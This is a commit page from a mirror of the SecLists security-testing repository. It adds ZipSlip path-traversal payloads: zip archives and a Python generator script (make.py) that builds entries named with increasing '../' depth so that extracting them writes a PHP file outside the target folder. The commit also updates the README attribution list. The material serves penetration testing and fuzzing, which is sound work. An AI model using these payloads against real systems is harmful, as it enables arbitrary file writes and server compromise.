mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-04-27 17:26:29 -04:00
Merge pull request #197 from g0tmi1k/zip
Add Zip-Traversal Payloads ("#ZipSlip")
This commit is contained in:
commit
16037f5f16
14 changed files with 56 additions and 25 deletions
BIN
Payloads/Zip-Traversal/depth-00.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-00.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-01.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-01.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-02.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-02.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-03.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-03.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-04.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-04.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-05.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-05.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-06.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-06.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-07.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-07.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-08.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-08.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-09.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-09.zip
Normal file
Binary file not shown.
BIN
Payloads/Zip-Traversal/depth-10.zip
Normal file
BIN
Payloads/Zip-Traversal/depth-10.zip
Normal file
Binary file not shown.
1
Payloads/Zip-Traversal/index.php
Normal file
1
Payloads/Zip-Traversal/index.php
Normal file
|
@ -0,0 +1 @@
|
|||
hacked
|
30
Payloads/Zip-Traversal/make.py
Executable file
30
Payloads/Zip-Traversal/make.py
Executable file
|
@ -0,0 +1,30 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
import zipfile
|
||||
|
||||
# The file to USE inside the zip, before compression
|
||||
filein = "index.php"
|
||||
print("[i] FileIn: %s\n" % filein)
|
||||
|
||||
# How deep are we going?
|
||||
depth = ""
|
||||
|
||||
# Loop 11 times (00-10)
|
||||
for i in range(11):
|
||||
# The .zip file to use
|
||||
zipname = "depth-%02d.zip" % i
|
||||
print("[i] ZipName: %s" % zipname)
|
||||
|
||||
# Get the zip file out ready
|
||||
with zipfile.ZipFile(zipname , 'w') as zip:
|
||||
# The file INSIDDE the zip
|
||||
filezip = "%s%s" % (depth, filein)
|
||||
print("[i] ZipFile: %s" % filezip)
|
||||
|
||||
# Write the zip file out
|
||||
zip.write(filein, filezip)
|
||||
|
||||
# Increase depth for next loop
|
||||
depth += "../"
|
||||
|
||||
print("\n[i] Done")
|
50
README.md
50
README.md
|
@ -19,34 +19,34 @@ Significant effort is made to give attribution for these lists whenever possible
|
|||
|
||||
### Attribution
|
||||
|
||||
- Adam Muntner and for the FuzzDB content, including all authors from the FuzzDB project (https://github.com/fuzzdb-project/fuzzdb)
|
||||
- Ron Bowes of SkullSecurity for collaborating and including all his lists here (https://wiki.skullsecurity.org/Passwords)
|
||||
- Clarkson University for their research that led to the Clarkson list
|
||||
- Adam Muntner and for the **FuzzDB** content, including all authors from the FuzzDB project (https://github.com/fuzzdb-project/fuzzdb) [`./Fuzzing/*.fuzzdb.txt`]
|
||||
- Ron Bowes of **SkullSecurity** for collaborating and including all his lists here (https://wiki.skullsecurity.org/Passwords)
|
||||
- Clarkson University for their research that led to the **Clarkson password** list [`./Passwords/clarkson-university-82.txt`]
|
||||
- All the authors listed in the XSS with context doc, which was found on pastebin and added to by us
|
||||
- Ferruh Mavitina for the beginnings of the LFI Fuzz list
|
||||
- Kevin Johnson for laudnaum shells (https://sourceforge.net/projects/laudanum/)
|
||||
- RSnake for fierce hostname list
|
||||
- Charlie Campbell for Spanish word list, numerous other contributions
|
||||
- Rob Fuller for the IZMY list
|
||||
- Mark Burnett for the 10 million passwords list
|
||||
- @shipCod3 for an SSH user/pass list
|
||||
- Ferruh Mavitina for the beginnings of the **LFI Fuzz** list
|
||||
- Kevin Johnson for **laudnaum shells** (https://sourceforge.net/projects/laudanum/) [`./Web-Shells/laudanum-0.8/`]
|
||||
- RSnake for **fierce DNS hostname** list [`./Discovery/DNS/fierce-hostlist.txt`]
|
||||
- Charlie Campbell for **Spanish word list**, numerous other contributions
|
||||
- Rob Fuller for the IZMY list [`./Passwords/Leaked-Databases/izmy.txt`]
|
||||
- Mark Burnett for the **10 million passwords** list
|
||||
- @shipCod3 for an **SSH user/pass** list
|
||||
- Steve Crapo for doing splitting work on a number of large lists
|
||||
- Thanks to Blessen Thomas for recommending Mario's/cure53's XSS vectors
|
||||
- Thanks to Danny Chrastil for submitting an anonymous JSON fuzzing list
|
||||
- Thanks to Blessen Thomas for recommending **Mario's/cure53's XSS vectors**
|
||||
- Thanks to Danny Chrastil for submitting an anonymous **JSON fuzzing** list
|
||||
- Many thanks to @geekspeed, @EricSB, @lukebeer, @patrickmollohan, @g0tmi1k, @albinowax, and @kurobeats for submitting via pull requests
|
||||
- Special thanks to @shipcod3 for MANY contributions!
|
||||
- Thanks to Samar Dhwoj Acharya for allowing his Github Dorks content to be included!
|
||||
- Thanks to Liam Somerville for the excellent list of default passwords
|
||||
- Great thanks to Michael Henriksen for allowing us to include his Gitrob project's signatures
|
||||
- Honored to have @Brutelogic's brilliant XSS Cheatsheet added to the Fuzzing section!
|
||||
- 0xsobky's Ultimate XSS Polyglot!
|
||||
- @otih for bruteforce collected username and password lists
|
||||
- @govolution for betterdefaultpasslist (https://github.com/govolution/betterdefaultpasslist)
|
||||
- Max Woolf (@minimaxir) for **big-list-of-naughty-strings** (https://github.com/minimaxir/big-list-of-naughty-strings) [`/Fuzzing/big-list-of-naughty-strings.txt`]
|
||||
- Ian Gallagher (@craSH) for **http-request-headers** [`/Miscellaneous/http-request-headers/`]
|
||||
- Arvind Doraiswamy (@arvinddoraiswamy) for **numeric-fields-only** [`/Fuzzing/numeric_fields_only.txt`]
|
||||
- @badibouzouk for **Domino Hunter** (https://sourceforge.net/projects/dominohunter/) [`/Discovery/Web-Content/Domino-Hunter/`]
|
||||
- @coldfusion39 for **domi-owned** (https://github.com/coldfusion39/domi-owned) [`/Discovery/Web-Content/domino-*-coldfusion39.txt`]
|
||||
- Special thanks to @shipcod3 for MANY contributions
|
||||
- Thanks to Samar Dhwoj Acharya for allowing his **Github Dorks** content to be included
|
||||
- Thanks to Liam Somerville for the excellent list of **default passwords**
|
||||
- Great thanks to Michael Henriksen for allowing us to include his **Gitrob project's signatures**
|
||||
- Honored to have @Brutelogic's brilliant **XSS Cheatsheet** added to the Fuzzing section [`./Fuzzing/XSS*-BruteLogic.txt`]
|
||||
- 0xsobky's **Ultimate XSS Polyglot** [`./Fuzzing/Polyglots/XSS-Polyglot-Ultimate-0xsobky.txt`]
|
||||
- @otih for **bruteforce collected user/pass** lists [`./Passwords/Honeypot-Captures/multiplesources-passwords-fabian-fingerle.de.txt`]
|
||||
- @govolution for **BetterDefaultPassList** (https://github.com/govolution/betterdefaultpasslist) [`./Passwords/Default-Credentials/*-betterdefaultpasslist.txt`]
|
||||
- Max Woolf (@minimaxir) for **Big List of Naughty Strings** (https://github.com/minimaxir/big-list-of-naughty-strings) [`./Fuzzing/big-list-of-naughty-strings.txt`]
|
||||
- Ian Gallagher (@craSH) for **HTTP Request Headers** [`./Miscellaneous/http-request-headers/`]
|
||||
- Arvind Doraiswamy (@arvinddoraiswamy) for **numeric-fields-only** [`./Fuzzing/numeric_fields_only.txt`]
|
||||
- @badibouzouk for **Domino Hunter** (https://sourceforge.net/projects/dominohunter/) [`./Discovery/Web-Content/Domino-Hunter/`]
|
||||
- @coldfusion39 for **domi-owned** (https://github.com/coldfusion39/domi-owned) [`./Discovery/Web-Content/domino-*-coldfusion39.txt`]
|
||||
|
||||
This project stays great because of care and love from the community, and we will never forget that. If you know of a contribution that is not listed above, please let us know…
|
||||
|
||||
|
|
Loading…
Add table
Reference in a new issue